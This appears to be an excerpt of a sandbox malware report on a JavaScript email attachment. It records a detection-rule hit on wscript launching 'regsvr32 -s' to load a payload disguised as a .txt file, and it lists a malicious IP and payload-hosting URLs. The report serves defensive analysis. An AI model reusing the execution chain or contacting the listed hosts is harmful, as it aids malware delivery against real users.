Source: Process started. Author: Florian Roth. Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_i1j.js', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2972, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt, ProcessId: 2396

Joe Sandbox View / Context

IPs

Match            Associated Sample Name / URL   Detection   Context
47.241.106.208   open_attach_n2k.js             malicious   api10.dianer.at/jvassets/xI/t64.dat
47.241.106.208   job_attach_t9o.js              malicious   f1.pipen.at/favicon.ico

Domains

No context

ASN

Match: unknown (20 associated samples in the same ASN; per-sample IP list not reproduced)

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.